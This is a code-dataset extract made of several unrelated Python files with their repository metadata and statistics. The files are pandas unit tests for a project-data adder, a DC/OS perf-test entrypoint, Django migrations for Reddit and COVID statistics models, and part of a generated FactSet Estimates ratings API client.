50f1be6ab9a53b1864beea2756eca6c7f8d9b40f
|
[
"MIT"
] | null | null | null |
parser/adder_Tests.py
|
musashin/DashBoardTest
|
50f1be6ab9a53b1864beea2756eca6c7f8d9b40f
|
[
"MIT"
] | null | null | null |
import unittest
from parser import adder
import pandas as pd
from datetime import datetime
class AdderTests(unittest.TestCase):
"""
Test in normal conditions
"""
def test_simple_addition(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
project1 = pd.DataFrame(index=invoice_weeks, data= {'X': [40, 50, 60],
'Y': [10000, 20000, 30000],
'CPI': [10, 20, 30]})
project2 = pd.DataFrame(index=invoice_weeks, data={'X': [10, 10, 10],
'Y': [30, 40, 50],
'CPI': [100, 20, 100]})
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [50, 60, 70],
'Y': [10030, 20040, 30050],
'CPI': [55, 20, 65]}, dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
def test_multiple_simple_addition(self):
total = pd.DataFrame(columns=['X', 'CPI'], dtype=float)
date_today = datetime.now()
invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
project = pd.DataFrame(index=invoice_weeks, data={'X': [10, 20, 30],
'CPI': [10, 20, 30]})
for idx in range(5):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [10*5, 20*5, 30*5],
'CPI': [10, 20, 30]}, dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
def test_finishing_late_no_overlap(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
'Y': [10000, 20000, 30000],
'CPI': [10, 20, 30]})
project2_invoice_weeks = pd.date_range(date_today+pd.Timedelta(3, unit='W'), periods=3, freq='W')
project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
'Y': [30, 40, 50],
'CPI': [100, 20, 100]})
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [40, 50, 60, 70, 70, 70],
'Y': [10000, 20000, 30000, 30000+30, 30000+40, 30000+50],
'CPI': [10, 20, 30,
(100+30)/2, (20+30)/2, (100+30)/2]},
dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
def test_finishing_late_overlap(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
'Y': [10000, 20000, 30000],
'CPI': [10, 20, 30]})
project2_invoice_weeks = pd.date_range(date_today+pd.Timedelta(2, unit='W'), periods=3, freq='W')
project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
'Y': [30, 40, 50],
'CPI': [100, 20, 100]})
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [40, 50, 70, 70, 70],
'Y': [10000, 20000, 30000+30, 30000+40, 30000+50],
'CPI': [10, 20,
(100+30)/2, (20+30)/2, (100+30)/2]},
dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
def test_starting_early_no_overlap(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
'Y': [10000, 20000, 30000],
'CPI': [10, 20, 30]})
project2_invoice_weeks = pd.date_range(date_today-pd.Timedelta(3, unit='W'), periods=3, freq='W')
project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
'Y': [30, 40, 50],
'CPI': [100, 20, 100]})
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [10, 10, 10, 50, 60, 70],
'Y': [30, 40, 50, 10000+50, 20000+50, 30000+50],
'CPI': [100, 20, 100,
(100+10)/2, (100+20)/2, (100+30)/2]},
dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
def test_starting_early_overlap(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
'Y': [10000, 20000, 30000],
'CPI': [10, 20, 30]})
project2_invoice_weeks = pd.date_range(date_today-pd.Timedelta(2, unit='W'), periods=3, freq='W')
project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
'Y': [30, 40, 50],
'CPI': [100, 20, 100]})
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [10, 10, 50, 60, 70],
'Y': [30, 40, 10000+50, 20000+50, 30000+50],
'CPI': [100, 20,
(100+10)/2, (100+20)/2, (100+30)/2]},
dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
class AdderGaps(unittest.TestCase):
"""
Test with Gaps
"""
def test_date_gap(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
invoice_weeks = pd.date_range(date_today, periods=6, freq='W')
project1 = pd.DataFrame(index=invoice_weeks, data={'X': [40, 50, 60, 70, 80, 90],
'Y': [10000, 20000, 30000, 100, 300, 300],
'CPI': [10, 20, 30, 40, 50, 60]})
project2 = pd.DataFrame(index=invoice_weeks, data={'X': [1, 2, 3, 4, 5, 6],
'Y': [7, 8, 9, 10, 11, 12],
'CPI': [13, 14, 15, 16, 17, 18]})
project2.drop(project2.index[2], inplace=True)
project2.drop(project2.index[2], inplace=True)
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [40+1, 50+2, 60, 70, 80+5, 90+6],
'Y': [10000+7, 20000+8, 30000, 100, 300+11, 300+12],
'CPI': [(10+13)/2, (20+14)/2, 30, 40, (50+17)/2, (60+18)/2]},
dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
def test_date_gap2(self):
total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
date_today = datetime.now()
invoice_weeks = pd.date_range(date_today, periods=6, freq='W')
project1 = pd.DataFrame(index=invoice_weeks, data={'X': [40, 50, 60, 70, 80, 90],
'Y': [10000, 20000, 30000, 100, 300, 300],
'CPI': [10, 20, 30, 40, 50, 60]})
project2 = pd.DataFrame(index=invoice_weeks, data={'X': [1, 2, 3, 4, 5, 6],
'Y': [7, 8, 9, 10, 11, 12],
'CPI': [13, 14, 15, 16, 17, 18]})
project2.drop(project2.index[2], inplace=True)
project2.drop(project2.index[2], inplace=True)
for idx, project in enumerate((project1, project2)):
adder.add_project_data(total, project, idx, column_to_average=('CPI'))
expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [40 + 1, 50 + 2, 60, 70, 80 + 5, 90 + 6],
'Y': [10000 + 7, 20000 + 8, 30000, 100, 300 + 11,
300 + 12],
'CPI': [(10 + 13) / 2, (20 + 14) / 2, 30, 40,
(50 + 17) / 2, (60 + 18) / 2]},
dtype=float)
expected_result.sort_index(inplace=True, axis=1)
self.assertTrue(total.equals(expected_result))
| 53
| 133
| 0.440859
| 1,281
| 12,614
| 4.186573
| 0.08587
| 0.087265
| 0.068618
| 0.060227
| 0.94518
| 0.94518
| 0.94518
| 0.937535
| 0.912735
| 0.902293
| 0
| 0.129606
| 0.4342
| 12,614
| 238
| 134
| 53
| 0.62183
| 0.003171
| 0
| 0.714286
| 0
| 0
| 0.015306
| 0
| 0
| 0
| 0
| 0
| 0.049689
| 1
| 0.049689
| false
| 0
| 0.024845
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a08091ac85a3254addc29750a11736e808bc700
| 154
|
py
|
Python
|
dcos-perf-test-driver.py
|
mesosphere/dcos-perf-test-driver
|
8fba87cb6c6f64690c0b5bef5c7d9f2aa0fba06b
|
[
"Apache-2.0"
] | 2
|
2018-02-27T18:21:21.000Z
|
2018-03-16T12:12:12.000Z
|
dcos-perf-test-driver.py
|
mesosphere/dcos-perf-test-driver
|
8fba87cb6c6f64690c0b5bef5c7d9f2aa0fba06b
|
[
"Apache-2.0"
] | 1
|
2018-06-25T07:14:41.000Z
|
2018-06-25T07:14:41.000Z
|
dcos-perf-test-driver.py
|
mesosphere/dcos-perf-test-driver
|
8fba87cb6c6f64690c0b5bef5c7d9f2aa0fba06b
|
[
"Apache-2.0"
] | 1
|
2020-06-25T10:37:21.000Z
|
2020-06-25T10:37:21.000Z
|
#!/usr/bin/env python3
import sys
from performance.driver.core.cli.entrypoints import dcos_perf_test_driver
sys.exit(dcos_perf_test_driver(sys.argv[1:]))
| 30.8
| 73
| 0.824675
| 26
| 154
| 4.653846
| 0.692308
| 0.132231
| 0.198347
| 0.297521
| 0.347107
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013793
| 0.058442
| 154
| 4
| 74
| 38.5
| 0.82069
| 0.136364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3a1683a99f7f78f056a4688fc45b959a3be7a5a7
| 3,300
|
py
|
Python
|
velkozz_web_api/apps/social_media_api/migrations/0001_initial.py
|
velkoz-data-ingestion/velkozz_web_api
|
519a6a90e5fdf5bab8ba2daf637768c5fd424a12
|
[
"MIT"
] | null | null | null |
velkozz_web_api/apps/social_media_api/migrations/0001_initial.py
|
velkoz-data-ingestion/velkozz_web_api
|
519a6a90e5fdf5bab8ba2daf637768c5fd424a12
|
[
"MIT"
] | null | null | null |
velkozz_web_api/apps/social_media_api/migrations/0001_initial.py
|
velkoz-data-ingestion/velkozz_web_api
|
519a6a90e5fdf5bab8ba2daf637768c5fd424a12
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-02-09 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='SciencePosts',
fields=[
('id', models.CharField(db_index=True, max_length=20, primary_key=True, serialize=False, unique=True)),
('title', models.CharField(max_length=300)),
('content', models.TextField(null=True)),
('upvote_ratio', models.FloatField(null=True)),
('score', models.IntegerField(null=True)),
('num_comments', models.IntegerField(null=True)),
('created_on', models.DateTimeField()),
('stickied', models.BooleanField(null=True)),
('over_18', models.BooleanField(null=True)),
('spoiler', models.BooleanField(null=True)),
('author_is_gold', models.BooleanField(null=True)),
('author_mod', models.BooleanField(null=True)),
('author_has_verified_email', models.BooleanField(null=True)),
('permalink', models.URLField(max_length=300, null=True)),
('author', models.CharField(max_length=300)),
('author_created', models.DateTimeField()),
('comment_karma', models.IntegerField(null=True)),
('subreddit', models.CharField(default='science', editable=False, max_length=200)),
],
options={
'verbose_name_plural': 'Science Subreddit Posts',
'ordering': ['created_on'],
'abstract': False,
},
),
migrations.CreateModel(
name='WallStreetBetsPosts',
fields=[
('id', models.CharField(db_index=True, max_length=20, primary_key=True, serialize=False, unique=True)),
('title', models.CharField(max_length=300)),
('content', models.TextField(null=True)),
('upvote_ratio', models.FloatField(null=True)),
('score', models.IntegerField(null=True)),
('num_comments', models.IntegerField(null=True)),
('created_on', models.DateTimeField()),
('stickied', models.BooleanField(null=True)),
('over_18', models.BooleanField(null=True)),
('spoiler', models.BooleanField(null=True)),
('author_is_gold', models.BooleanField(null=True)),
('author_mod', models.BooleanField(null=True)),
('author_has_verified_email', models.BooleanField(null=True)),
('permalink', models.URLField(max_length=300, null=True)),
('author', models.CharField(max_length=300)),
('author_created', models.DateTimeField()),
('comment_karma', models.IntegerField(null=True)),
('subreddit', models.CharField(default='wallstreetbets', editable=False, max_length=200)),
],
options={
'verbose_name_plural': 'WallStreetBets Subreddit Posts',
'ordering': ['created_on'],
'abstract': False,
},
),
]
| 46.478873
| 119
| 0.555455
| 298
| 3,300
| 6.003356
| 0.271812
| 0.107323
| 0.147568
| 0.174399
| 0.856344
| 0.856344
| 0.856344
| 0.807155
| 0.807155
| 0.752376
| 0
| 0.020364
| 0.300606
| 3,300
| 70
| 120
| 47.142857
| 0.754766
| 0.013636
| 0
| 0.761905
| 1
| 0
| 0.167538
| 0.01537
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015873
| 0
| 0.079365
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3a3612fba113676b19197299e6acc4985413dfa5
| 2,303
|
py
|
Python
|
app/core/migrations/0010_indiacovidstats_worldcovidstats.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | 1
|
2020-04-27T15:20:15.000Z
|
2020-04-27T15:20:15.000Z
|
app/core/migrations/0010_indiacovidstats_worldcovidstats.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | null | null | null |
app/core/migrations/0010_indiacovidstats_worldcovidstats.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | 1
|
2020-05-30T13:55:22.000Z
|
2020-05-30T13:55:22.000Z
|
# Generated by Django 3.0.5 on 2020-04-26 14:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0009_auto_20200426_0835'),
]
operations = [
migrations.CreateModel(
name='IndiaCovidStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(max_length=30)),
('total_case', models.CharField(max_length=20)),
('new_case', models.CharField(max_length=20)),
('total_death', models.CharField(max_length=20)),
('new_death', models.CharField(max_length=20)),
('total_recovered', models.CharField(max_length=20)),
('active_case', models.CharField(max_length=20)),
('serious_critical', models.CharField(max_length=20)),
('cases_per_million', models.CharField(max_length=20)),
('deaths_per_million', models.CharField(max_length=20)),
('total_test', models.CharField(max_length=20)),
('test_per_million', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='WorldCovidStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=30)),
('total_case', models.CharField(max_length=20)),
('new_case', models.CharField(max_length=20)),
('total_death', models.CharField(max_length=20)),
('new_death', models.CharField(max_length=20)),
('total_recovered', models.CharField(max_length=20)),
('active_case', models.CharField(max_length=20)),
('serious_critical', models.CharField(max_length=20)),
('cases_per_million', models.CharField(max_length=20)),
('deaths_per_million', models.CharField(max_length=20)),
('total_test', models.CharField(max_length=20)),
('test_per_million', models.CharField(max_length=20)),
],
),
]
| 46.06
| 114
| 0.579679
| 239
| 2,303
| 5.330544
| 0.246862
| 0.282575
| 0.339089
| 0.452119
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0
| 0.047562
| 0.278767
| 2,303
| 49
| 115
| 47
| 0.719446
| 0.01954
| 0
| 0.744186
| 1
| 0
| 0.158688
| 0.010195
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
28a90038d9f45c4db424cf0a561735e6895fc38a
| 59,385
|
py
|
Python
|
code/python/FactSetEstimates/v2/fds/sdk/FactSetEstimates/api/ratings_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/FactSetEstimates/v2/fds/sdk/FactSetEstimates/api/ratings_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/FactSetEstimates/v2/fds/sdk/FactSetEstimates/api/ratings_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
FactSet Estimates
Gain access to 20+ years of comprehensive estimates and statistics of over 250+ estimated metrics, including financial statement items, product segments, geosegments, and industry metrics. FactSet's consensus estimates are aggregated from a wide base of over 800+ contributors and cover over 19,000 active companies across 90+ countries. Data returned can be accessed on the data frequencies based on quarterly, fiscal years, and calendar years. FactSet Estimates updates on a real time basis intraday (every 5 minutes). Updating times vary based on earning season vs. non-earning season but the goal is to have the data available to the client within a few hours that FactSet receives updated information. Often times updates times can be much faster as FactSet has always been known as one of the fastest estimate providers in the market. # noqa: E501
The version of the OpenAPI document: 2.3.0
Contact: api@factset.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.FactSetEstimates.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.FactSetEstimates.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.FactSetEstimates.exceptions import ApiException
from fds.sdk.FactSetEstimates.model.consensus_ratings_request import ConsensusRatingsRequest
from fds.sdk.FactSetEstimates.model.consensus_ratings_response import ConsensusRatingsResponse
from fds.sdk.FactSetEstimates.model.detail_ratings_request import DetailRatingsRequest
from fds.sdk.FactSetEstimates.model.detail_ratings_response import DetailRatingsResponse
from fds.sdk.FactSetEstimates.model.error_response import ErrorResponse
class RatingsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.get_consensus_ratings_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (ConsensusRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-estimates/v2/consensus-ratings',
'operation_id': 'get_consensus_ratings',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'ids',
'start_date',
'end_date',
'frequency',
],
'required': [
'ids',
],
'nullable': [
],
'enum': [
'frequency',
],
'validation': [
'ids',
]
},
root_map={
'validations': {
('ids',): {
'max_items': 3000,
'min_items': 1,
},
},
'allowed_values': {
('frequency',): {
"D": "D",
"W": "W",
"AM": "AM",
"AQ": "AQ",
"AY": "AY"
},
},
'openapi_types': {
'ids':
([str],),
'start_date':
(str,),
'end_date':
(str,),
'frequency':
(str,),
},
'attribute_map': {
'ids': 'ids',
'start_date': 'startDate',
'end_date': 'endDate',
'frequency': 'frequency',
},
'location_map': {
'ids': 'query',
'start_date': 'query',
'end_date': 'query',
'frequency': 'query',
},
'collection_format_map': {
'ids': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_consensus_ratings_for_list_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (ConsensusRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-estimates/v2/consensus-ratings',
'operation_id': 'get_consensus_ratings_for_list',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'consensus_ratings_request',
],
'required': [
'consensus_ratings_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'consensus_ratings_request':
(ConsensusRatingsRequest,),
},
'attribute_map': {
},
'location_map': {
'consensus_ratings_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_detail_ratings_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (DetailRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-estimates/v2/detail-ratings',
'operation_id': 'get_detail_ratings',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'ids',
'start_date',
'end_date',
],
'required': [
'ids',
],
'nullable': [
],
'enum': [
],
'validation': [
'ids',
]
},
root_map={
'validations': {
('ids',): {
'max_items': 3000,
'min_items': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'ids':
([str],),
'start_date':
(str,),
'end_date':
(str,),
},
'attribute_map': {
'ids': 'ids',
'start_date': 'startDate',
'end_date': 'endDate',
},
'location_map': {
'ids': 'query',
'start_date': 'query',
'end_date': 'query',
},
'collection_format_map': {
'ids': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_detail_ratings_for_list_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (DetailRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-estimates/v2/detail-ratings',
'operation_id': 'get_detail_ratings_for_list',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'detail_ratings_request',
],
'required': [
'detail_ratings_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'detail_ratings_request':
(DetailRatingsRequest,),
},
'attribute_map': {
},
'location_map': {
'detail_ratings_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def get_consensus_ratings(
self,
ids,
**kwargs
) -> ConsensusRatingsResponse:
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ConsensusRatingsResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_with_http_info(
self,
ids,
**kwargs
) -> typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]:
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ConsensusRatingsResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_async(
self,
ids,
**kwargs
) -> "ApplyResult[ConsensusRatingsResponse]":
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
